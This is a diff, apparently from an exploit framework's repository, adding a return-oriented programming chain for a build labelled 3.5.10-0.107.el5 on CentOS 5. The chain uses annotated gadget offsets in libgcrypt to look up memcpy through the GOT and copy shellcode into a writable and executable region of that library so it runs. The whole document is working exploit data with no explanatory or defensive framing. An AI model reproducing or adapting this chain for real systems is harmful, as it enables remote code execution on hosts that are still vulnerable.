|
260 | 260 |
|
261 | 261 | </rop> |
262 | 262 |
|
| 263 | + <rop> |
| 264 | + <compatibility> |
| 265 | + <target>3.5.10-0.107.el5 on CentOS 5</target> |
| 266 | + </compatibility> |
263 | 267 |
|
| 268 | + <!-- |
| 269 | + yum list |grep libgcrypt |
| 270 | + libgcrypt.i386 1.4.4-5.el5 installed |
| 271 | + 02c63000-02ce1000 r-xp 00000000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2 |
| 272 | + 02ce1000-02ce4000 rwxp 0007d000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2 |
| 273 | + section is writable and executable, we'll copy the shellcode over there instead of using mmap |
| 274 | + --> |
| 275 | + |
| 276 | + <gadgets base="0"> |
| 277 | + <gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget> |
| 278 | + <gadget offset="0x0005e842">pop eax ; pop ebx ; pop esi ; pop edi ; ret || eax = ret eip from call esi, ebx = esp, esi = edi = junk</gadget> |
| 279 | + <gadget value ="0x00000000">ebp = junk to be skipped over</gadget> |
| 280 | + <gadget offset="0x00028374">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000007 ; call esi</gadget> |
| 281 | + <gadget value ="0x00000000">esi = junk to be skipped over</gadget> |
| 282 | + <gadget value ="0x00000000">edi = junk to be skipped over</gadget> |
| 283 | + <gadget offset="0x00062c29">xchg eax, ebx ; ret || eax = esp</gadget> |
| 284 | + <gadget offset="0x0006299c">pop ecx ; ret</gadget> |
| 285 | + <gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget> |
| 286 | + <gadget offset="0x0005a44d">add ecx, eax ; mov eax, ecx ; ret || eax = ecx = shellcode</gadget> |
| 287 | + <gadget offset="0x0006f5a1">pop edx ; inc ebx ; ret || set edx = to dst in memcpy for ret after pushad</gadget> |
| 288 | + <gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget> |
| 289 | + <gadget offset="0x0006a73f">pop eax ; ret</gadget> |
| 290 | + <gadget offset="0x0007effc">memcpy@got - 4</gadget> |
| 291 | + <gadget offset="0x00015e47">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget> |
| 292 | + <gadget offset="0x00062c29">xchg eax, ebx ; ret || ebx = @memcpy</gadget> |
| 293 | + <gadget offset="0x0001704e">mov eax, ecx ; ret || eax = ecx = src in memcpy</gadget> |
| 294 | + <gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget> |
| 295 | + <gadget offset="0x0007ef54">esi = offset of .got.plt section</gadget> |
| 296 | + <gadget value ="0x00000000">ebp = junk to be skipped over</gadget> |
| 297 | + <gadget offset="0x0006299c">pop ecx ; ret</gadget> |
| 298 | + <gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget> |
| 299 | + <gadget offset="0x00007a2b">pop edi ; pop ebp ** 1 **; ret</gadget> |
| 300 | + <gadget offset="0x00004276">(P) pop ebx ; pop esi ; pop ebp ; ret</gadget> |
| 301 | + <gadget value ="0x00000000">junk for ebp **1**</gadget> |
| 302 | + <gadget offset="0x0006200a">pushad ; ret</gadget> |
| 303 | + <gadget value ="size">payload size</gadget> |
| 304 | + </gadgets> |
| 305 | + |
| 306 | + |
| 307 | + </rop> |
264 | 308 |
|
265 | 309 |
|
266 | 310 |
|
|
0 commit comments